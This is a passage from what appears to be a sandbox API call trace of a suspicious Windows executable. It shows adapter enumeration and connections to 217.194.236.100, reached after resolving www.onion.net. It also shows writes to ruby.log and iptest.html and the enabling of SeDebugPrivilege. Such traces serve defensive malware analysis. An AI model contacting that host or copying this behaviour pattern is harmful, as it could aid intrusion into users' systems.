dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x116eb6c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x116eb6c, lpOverlapped=0x0) returned -1 [0271.318] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x116e89c, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0271.318] WSAEventSelect (s=0x548, hEventObject=0x54c, lNetworkEvents=512) returned 0 [0271.320] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x116eb68*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x116eb68*=0x818) returned 0x6f [0271.340] LocalAlloc (uFlags=0x0, uBytes=0x818) returned 0x13dd2b8 [0271.340] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x13dd2b8, SizePointer=0x116eb68*=0x818 | out: AdapterAddresses=0x13dd2b8*(Alignment=0x300000178, Length=0x178, IfIndex=0x3, Next=0x13dd568, AdapterName="{9E48833B-70C6-43EE-85DC-893C1782D802}", FirstUnicastAddress=0x13dd4dc, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection #2", FriendlyName="Ethernet 2", PhysicalAddress=([0]=0x0, [1]=0x18, [2]=0xb7, [3]=0x99, [4]=0x38, [5]=0xf9, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x1c5, DdnsEnabled=0x1c5, RegisterAdapterSuffix=0x1c5, Dhcpv4Enabled=0x1c5, ReceiveOnly=0x1c5, NoMulticast=0x1c5, Ipv6OtherStatefulConfig=0x1c5, NetbiosOverTcpipEnabled=0x1c5, Ipv4Enabled=0x1c5, Ipv6Enabled=0x1c5, Ipv6ManagedAddressConfigurationSupported=0x1c5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0x3, ZoneIndices=([0]=0x3, [1]=0x3, [2]=0x3, [3]=0x3, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0x19, Ipv6Metric=0x19, Luid=0x6008002000000, Dhcpv4Server.lpSockaddr=0x13dd430*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11e7933cfae992b0, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x23, [5]=0x7d, [6]=0xeb, [7]=0x9, [8]=0x7c, [9]=0x4a, [10]=0x82, [11]=0x56, [12]=0xb9, [13]=0x2b, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x57c4a82, FirstDnsSuffix=0x0), SizePointer=0x116eb68*=0x818) returned 0x0 [0271.513] LocalFree (hMem=0x13dd2b8) returned 0x0 [0271.651] WSAConnect (in: s=0x510, name=0x31d8f60*(sa_family=2, sin_port=0x50, sin_addr="217.194.236.100"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0271.875] closesocket (s=0x4dc) returned 0 [0271.891] send (s=0x510, buf=0x31d9aa0*, len=73, flags=0) returned 73 [0271.912] setsockopt (s=0x510, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0271.914] recv (in: s=0x510, buf=0x31d56e8, len=4096, flags=0 | out: buf=0x31d56e8*) returned 4096 [0271.979] setsockopt (s=0x510, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0271.980] recv (in: s=0x510, buf=0x31dbb00, len=5578, flags=0 | out: buf=0x31dbb00*) returned 5578 [0271.981] SetEvent (hEvent=0x36c) returned 1 [0271.981] WriteFile (in: hFile=0x368, lpBuffer=0x31de050*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x116ee34, lpOverlapped=0x0 | out: lpBuffer=0x31de050*, lpNumberOfBytesWritten=0x116ee34*=0x1000, lpOverlapped=0x0) returned 1 [0272.039] WriteFile (in: hFile=0x368, lpBuffer=0x31dbc1f*, nNumberOfBytesToWrite=0x14ab, lpNumberOfBytesWritten=0x116ee34, lpOverlapped=0x0 | out: lpBuffer=0x31dbc1f*, lpNumberOfBytesWritten=0x116ee34*=0x14ab, lpOverlapped=0x0) returned 1 [0272.040] CloseHandle (hObject=0x368) returned 1 [0272.048] GetFullPathNameW (in: lpFileName="ruby.log", nBufferLength=0x105, lpBuffer=0x116e918, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ruby.log", lpFilePart=0x0) returned 0x20 [0272.193] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x116edcc) returned 1 [0272.193] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ruby.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ruby.log"), fInfoLevelId=0x0, lpFileInformation=0x116ee48 | out: lpFileInformation=0x116ee48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ece0d8a, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x8ece0d8a, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x90dca026, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x3d)) returned 1 [0272.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x116edc8) returned 1 [0272.194] GetFullPathNameW (in: lpFileName="ruby.log", nBufferLength=0x105, lpBuffer=0x116e918, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ruby.log", lpFilePart=0x0) returned 0x20 [0272.194] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x116ee18) returned 1 [0272.194] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ruby.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ruby.log"), fInfoLevelId=0x0, lpFileInformation=0x31df140 | out: lpFileInformation=0x31df140*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ece0d8a, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x8ece0d8a, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x90dca026, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x3d)) returned 1 [0272.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x116ee14) returned 1 [0272.195] GetFullPathNameW (in: lpFileName="ruby.log", nBufferLength=0x105, lpBuffer=0x116e7f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ruby.log", lpFilePart=0x0) returned 0x20 [0272.195] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x116ed3c) returned 1 [0272.195] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ruby.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ruby.log"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x368 [0272.196] GetFileType (hFile=0x368) returned 0x1 [0272.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x116ed38) returned 1 [0272.196] GetFileType (hFile=0x368) returned 0x1 [0272.197] SetFilePointer (in: hFile=0x368, lDistanceToMove=0, lpDistanceToMoveHigh=0x116ed10*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x116ed10*=0) returned 0x3d [0272.199] WriteFile (in: hFile=0x368, lpBuffer=0x31e08d0*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x116edcc, lpOverlapped=0x0 | out: lpBuffer=0x31e08d0*, lpNumberOfBytesWritten=0x116edcc*=0x44, lpOverlapped=0x0) returned 1 [0272.201] CloseHandle (hObject=0x368) returned 1 [0272.373] WriteFile (in: hFile=0x3d8, lpBuffer=0x31a547c*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x116edf8, lpOverlapped=0x0 | out: lpBuffer=0x31a547c*, lpNumberOfBytesWritten=0x116edf8*=0x2c, lpOverlapped=0x0) returned 1 [0272.579] GetFullPathNameW (in: lpFileName="iptest.html", nBufferLength=0x105, lpBuffer=0x116e8ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\iptest.html", lpFilePart=0x0) returned 0x23 [0272.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x116edf0) returned 1 [0272.579] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\iptest.html" (normalized: "c:\\users\\fd1hvy\\desktop\\iptest.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x368 [0272.844] GetFileType (hFile=0x368) returned 0x1 [0272.845] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x116edec) returned 1 [0272.845] GetFileType (hFile=0x368) returned 0x1 [0272.854] QueryPerformanceCounter (in: lpPerformanceCount=0x116ee74 | out: lpPerformanceCount=0x116ee74*=36726410876) returned 1 [0272.854] SetEvent (hEvent=0x36c) returned 1 [0272.862] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4dc [0272.863] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x550 [0272.863] GetAddrInfoW (in: pNodeName="www.onion.net", pServiceName=0x0, pHints=0x116ebb0*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x116eb58 | out: ppResult=0x116eb58*=0x13c63d0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="www.onion.net", ai_addr=0x13c7d50*(sa_family=2, sin_port=0x0, sin_addr="217.194.236.100"), ai_next=0x0)) returned 0 [0273.310] FreeAddrInfoW (pAddrInfo=0x13c63d0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="www.onion.net", ai_addr=0x13c7d50*(sa_family=2, sin_port=0x0, sin_addr="217.194.236.100"), ai_next=0x0)) [0273.319] WSAConnect (in: s=0x4dc, name=0x31f3af0*(sa_family=2, sin_port=0x1bb, sin_addr="217.194.236.100"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0273.348] closesocket (s=0x550) returned 0 [0273.374] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x116eab8 | out: phkResult=0x116eab8*=0x550) returned 0x0 [0273.377] RegQueryValueExW (in: hKey=0x550, lpValueName="HWRPortReuseOnSocketBind", lpReserved=0x0, lpType=0x116ead4, lpData=0x0, lpcbData=0x116ead0*=0x0 | out: lpType=0x116ead4*=0x0, lpData=0x0, lpcbData=0x116ead0*=0x0) returned 0x2 [0273.377] RegCloseKey (hKey=0x550) returned 0x0 [0273.411] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x116eabc | out: phkResult=0x116eabc*=0x550) returned 0x0 [0273.412] RegQueryValueExW (in: hKey=0x550, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0x116ead8, lpData=0x0, lpcbData=0x116ead4*=0x0 | out: lpType=0x116ead8*=0x0, lpData=0x0, lpcbData=0x116ead4*=0x0) returned 0x2 [0273.412] RegCloseKey (hKey=0x550) returned 0x0 [0273.424] GetCurrentProcessId () returned 0xd6c [0273.628] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x116e354 | out: lpLuid=0x116e354*(LowPart=0x14, HighPart=0)) returned 1 [0273.638] GetCurrentProcess () returned 0xffffffff [0273.638] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x116e350 | out: TokenHandle=0x116e350*=0x53c) returned 1 [0273.640] AdjustTokenPrivileges (in: TokenHandle=0x53c, DisableAllPrivileges=0, NewState=0x31f5e8c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0273.641] CloseHandle (hObject=0x53c) returned 1 [0274.015] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xd6c) returned 0x53c [0274.206] EnumProcessModules (in: hProcess=0x53c, lphModule=0x31f5ed0, cb=0x100, lpcbNeeded=0x116eac4 | out: lphModule=0x31f5ed0, lpcbNeeded=0x116eac4) returned 1 [0274.209] GetModuleInformation (in: hProcess=0x53c, hModule=0xdd0000, lpmodinfo=0x31f6010, cb=0xc | out: lpmodinfo=0x31f6010*(lpBaseOfDll=0xdd0000, SizeOfImage=0x8000, EntryPoint=0x0)) returned 1 [0274.210] CoTaskMemAlloc (cb=0x804) returned 0x13dd2b8 [0274.211] GetModuleBaseNameW (in: hProcess=0x53c, hModule=0xdd0000, lpBaseName=0x13dd2b8, nSize=0x800 | out: lpBaseName="onc2pn4u4214.exe") returned 0x10 [0274.212] CoTaskMemFree (pv=0x13dd2b8) [0274.213] CoTaskMemAlloc (cb=0x804) returned 0x13dd2b8 [0274.213] GetModuleFileNameExW (in: hProcess=0x53c, hModule=0xdd0000, lpFilename=0x13dd2b8, nSize=0x800 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\onc2pn4u4214.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\onc2pn4u4214.exe")) returned 0x28 [0274.213] CoTaskMemFree (pv=0x13dd2b8) [0274.214] CloseHandle (hObject=0x53c) returned 1 [0274.215] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\onc2pn4u4214.exe", nBufferLength=0x105, lpBuffer=0x116e5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\onc2pn4u4214.exe", lpFilePart=0x0) returned 0x28 [0274.215] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.SchSendAuxRecord", ulOptions=0x0, samDesired=0x20019, phkResult=0x116eabc | out: phkResult=0x116eabc*=0x0) returned 0x2 [0274.216] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x116eabc | out: phkResult=0x116eabc*=0x53c) returned 0x0 [0274.217] RegQueryValueExW (in: hKey=0x53c, lpValueName="SchSendAuxRecord", lpReserved=0x0, lpType=0x116ead8, lpData=0x0, lpcbData=0x116ead4*=0x0 | out: lpType=0x116ead8*=0x0, lpData=0x0, lpcbData=0x116ead4*=0x0) returned 0x2 [0274.217] RegCloseKey (hKey=0x53c) returned 0x0 [0274.218] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x116eabc | out: phkResult=0x116eabc*=0x53c) returned 0x0 [0274.218] RegQueryValueExW (in: hKey=0x53c, lpValueName="SystemDefaultTlsVersions", lpReserved=0x0, lpType=0x116ead8, lpData=0x0, lpcbData=0x116ead4*=0x0 | out: lpType=0x116ead8*=0x0, lpData=0x0, lpcbData=0x116ead4*=0x0) returned 0x2 [0274.218] RegCloseKey (hKey=0x53c) returned 0x0 [0274.228] GetCurrentProcessId () returned 0xd6c [0274.229] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xd6c) returned 0x53c [0274.229] EnumProcessModules (in: hProcess=0x53c, lphModule=0x31f8ca0, cb=0x100, lpcbNeeded=0x116eabc | out: lphModule=0x31f8ca0, lpcbNeeded=0x116eabc) returned 1 [0274.229] GetModuleInformation (in: hProcess=0x53c, hModule=0xdd0000, lpmodinfo=0x31f8de0, cb=0xc | out: lpmodinfo=0x31f8de0*(lpBaseOfDll=0xdd0000, SizeOfImage=0x8000, EntryPoint=0x0)) returned 1 [0274.229] CoTaskMemAlloc (cb=0x804) returned 0x13dd2b8 [0274.229] GetModuleBaseNameW (in: hProcess=0x53c, hModule=0xdd0000, lpBaseName=0x13dd2b8, nSize=0x800 | out: lpBaseName="onc2pn4u4214.exe") returned 0x10 [0274.230] CoTaskMemFree (pv=0x13dd2b8) [0274.230] CoTaskMemAlloc (cb=0x804) returned 0x13dd2b8 [0274.230] GetModuleFileNameExW (in: hProcess=0x53c, hModule=0xdd0000, lpFilename=0x13dd2b8, nSize=0x800 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\onc2pn4u4214.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\onc2pn4u4214.exe")) returned 0x28 [0274.231] CoTaskMemFree (pv=0x13dd2b8) [0274.231] CloseHandle (hObject=0x53c) returned 1 [0274.231] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\onc2pn4u4214.exe", nBufferLength=0x105, lpBuffer=0x116e5b8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\onc2pn4u4214.exe", lpFilePart=0x0) returned 0x28 [0274.232] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.RequireCertificateEKUs", ulOptions=0x0, samDesired=0x20019, phkResult=0x116eab4 | out: phkResult=0x116eab4*=0x0) returned 0x2 [0274.232] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x116eab4 | out: phkResult=0x116eab4*=0x53c) returned 0x0 [0274.233] RegQueryValueExW (in: hKey=0x53c, lpValueName="RequireCertificateEKUs", lpReserved=0x0, lpType=0x116ead0, lpData=0x0, lpcbData=0x116eacc*=0x0 | out: lpType=0x116ead0*=0x0, lpData=0x0, lpcbData=0x116eacc*=0x0) returned 0x2 [0274.233] RegCloseKey (hKey=0x53c) returned 0x0 [0274.479] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x13ba500 [0274.938] CryptFindOIDInfo (dwKeyType=0x2, pvKey=0x13ba500, dwGroupId=0x0) returned 0x0 [0275.167] LocalFree (hMem=0x13ba500) returned 0x0 [0275.167] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x13e6000 [0275.168] CryptFindOIDInfo (dwKeyType=0x2, pvKey=0x13e6000, dwGroupId=0x0) returned 0x0 [0275.168] LocalFree (hMem=0x13e6000) returned 0x0 [0275.215] EnumerateSecurityPackagesW (in: pcPackages=0x116eaf8, ppPackageInfo=0x116ea8c | out: pcPackages=0x116eaf8, ppPackageInfo=0x116ea8c) returned 0x0 [0276.134] FreeContextBuffer (in: pvContextBuffer=0x13d5ca0 | out: pvContextBuffer=0x13d5ca0) returned 0x0 [0276.156] GetCurrentProcess () returned 0xffffffff [0276.156] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x116e8bc | out: TokenHandle=0x116e8bc*=0x560) returned 1 [0276.161] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x31fb4bc, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x116e910, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x31fcbd4, ptsExpiry=0x116e894 | out: phCredential=0x31fcbd4, ptsExpiry=0x116e894) returned 0x0 [0276.871] InitializeSecurityContextW (in: phCredential=0x116e8d0, phContext=0x0, pTargetName=0x31f3b3c, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x31fcdc8, pOutput=0x31fcd60, pfContextAttr=0x31fb480, ptsExpiry=0x116e8c8 | out: phNewContext=0x31fcdc8, pOutput=0x31fcd60, pfContextAttr=0x31fb480, ptsExpiry=0x116e8c8) returned 0x90312 [0277.400] FreeContextBuffer (in: pvContextBuffer=0x13a8aa0 | out: pvContextBuffer=0x13a8aa0) returned 0x0 [0277.415] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x73b80000 [0277.421] GetProcAddress (hModule=0x73b80000, lpProcName="AppPolicyGetClrCompat") returned 0x74e468b0 [0277.422] AppPolicyGetClrCompat () returned 0x0 [0277.429] send (s=0x4dc, buf=0x31fcddc*, len=121, flags=0) returned 121 [0277.680] recv (in: s=0x4dc, buf=0x31fcddc, len=5, flags=0 | out: buf=0x31fcddc*) returned 5 [0277.681] recv (in: s=0x4dc, buf=0x31fd1a1, len=3016, flags=0 | out: buf=0x31fd1a1*) returned 3016 [0277.683] InitializeSecurityContextW (in: phCredential=0x116e828, phContext=0x116e8b8, pTargetName=0x31f3b3c, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x31fde40, Reserved2=0x0, phNewContext=0x31fcdc8, pOutput=0x31fde54, pfContextAttr=0x31fb480, ptsExpiry=0x116e820 | out: phNewContext=0x31fcdc8, pOutput=0x31fde54, pfContextAttr=0x31fb480, ptsExpiry=0x116e820) returned 0x90312 [0277.797] FreeContextBuffer (in: pvContextBuffer=0x13d6cc8 | out: pvContextBuffer=0x13d6cc8) returned 0x0 [0277.797] send (s=0x4dc, buf=0x31fded0*, len=101, flags=0) returned 101 [0277.799] recv (in: s=0x4dc, buf=0x31fded0, len=5, flags=0 | out: buf=0x31fded0*) returned 5 [0277.822] recv (in: s=0x4dc, buf=0x31fded5, len=1, flags=0 | out: buf=0x31fded5*) returned 1 [0277.824] InitializeSecurityContextW (in: phCredential=0x116e784, phContext=0x116e814, pTargetName=0x31f3b3c, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x31fdfbc, Reserved2=0x0, phNewContext=0x31fcdc8, pOutput=0x31fdfd0, pfContextAttr=0x31fb480, ptsExpiry=0x116e77c | out: phNewContext=0x31fcdc8, pOutput=0x31fdfd0, pfContextAttr=0x31fb480, ptsExpiry=0x116e77c) returned 0x90312 [0277.825] recv (in: s=0x4dc, buf=0x31fe060, len=5, flags=0 | out: buf=0x31fe060*) returned 5 [0277.825] recv (in: s=0x4dc, buf=0x31fe079, len=48, flags=0 | out: buf=0x31fe079*) returned 48 [0277.826] InitializeSecurityContextW (in: phCredential=0x116e6e0, phContext=0x116e770, pTargetName=0x31f3b3c, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x31fe11c, Reserved2=0x0, phNewContext=0x31fcdc8, pOutput=0x31fe130, pfContextAttr=0x31fb480, ptsExpiry=0x116e6d8 | out: phNewContext=0x31fcdc8, pOutput=0x31fe130, pfContextAttr=0x31fb480, ptsExpiry=0x116e6d8) returned 0x0 [0279.886] QueryContextAttributesW (in: phContext=0x31fcdc8, ulAttribute=0x4, pBuffer=0x31fe1dc | out: pBuffer=0x31fe1dc) returned 0x0 [0279.886] QueryContextAttributesW (in: phContext=0x31fcdc8, ulAttribute=0x5a, pBuffer=0x31fe234 | out: pBuffer=0x31fe234) returned 0x0 [0279.892] QueryContextAttributesW (in: phContext=0x31fcdc8, ulAttribute=0x53, pBuffer=0x31fe2e0 | out: pBuffer=0x31fe2e0) returned 0x0 [0280.129] CertDuplicateCertificateContext (pCertContext=0x13a6730) returned 0x13a6730 [0280.133] CertDuplicateStore (hCertStore=0x13d3c20) returned 0x13d3c20 [0280.135] CertEnumCertificatesInStore (hCertStore=0x13d3c20, pPrevCertContext=0x0) returned 0x13a6960 [0280.135] CertDuplicateCertificateContext (pCertContext=0x13a6960) returned 0x13a6960 [0280.137] CertEnumCertificatesInStore (hCertStore=0x13d3c20, pPrevCertContext=0x13a6960) returned 0x13a6730 [0280.138] CertDuplicateCertificateContext (pCertContext=0x13a6730) returned 0x13a6730 [0280.138] CertEnumCertificatesInStore (hCertStore=0x13d3c20, pPrevCertContext=0x13a6730) returned 0x0 [0280.138] CertCloseStore (hCertStore=0x13d3c20, dwFlags=0x0) returned 1 [0280.138] CertFreeCertificateContext (pCertContext=0x13a6730) returned 1 [0280.889] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x13d3d10 [0280.893] CertAddCRLLinkToStore (in: hCertStore=0x13d3d10, pCrlContext=0x13a6960, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0280.899] CertAddCRLLinkToStore (in: hCertStore=0x13d3d10, pCrlContext=0x13a6730, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0280.901] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x13de1a0 [0280.915] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x13a6730, pTime=0x116e6f0, hAdditionalStore=0x13d3d10, pChainPara=0x116e630, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x116e624 | out: ppChainContext=0x116e624) returned 1 [0281.167] LocalFree (hMem=0x13de1a0) returned 0x0 [0281.168] CertDuplicateCertificateChain (pChainContext=0x13f03a8) returned 0x13f03a8 [0281.170] CertDuplicateCertificateContext (pCertContext=0x13a6730) returned 0x13a6730 [0281.170] CertDuplicateCertificateContext (pCertContext=0x13eff90) returned 0x13eff90 [0281.171] CertDuplicateCertificateContext (pCertContext=0x13f01c0) returned 0x13f01c0 [0281.171] CertFreeCertificateChain (pChainContext=0x13f03a8) [0281.173] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x13f03a8, pPolicyPara=0x116e7d0, pPolicyStatus=0x116e7bc | out: pPolicyStatus=0x116e7bc) returned 1 [0281.175] SetLastError (dwErrCode=0x0) [0281.512] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x13f03a8, pPolicyPara=0x116e830, pPolicyStatus=0x116e7e4 | out: pPolicyStatus=0x116e7e4) returned 1 [0281.547] CertFreeCertificateChain (pChainContext=0x13f03a8) [0281.548] CertFreeCertificateContext (pCertContext=0x13a6730) returned 1 [0281.836] CoTaskMemAlloc (cb=0x20c) returned 0x13f03a8 [0281.836] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_Disabled", lpBuffer=0x13f03a8, nSize=0x104 | out: lpBuffer="篐Ŀ汐ĿĀ") returned 0x0 [0281.837] CoTaskMemFree (pv=0x13f03a8) [0281.837] CoTaskMemAlloc (cb=0x20c) returned 0x13f03a8 [0281.837] GetEnvironmentVariableW (in: 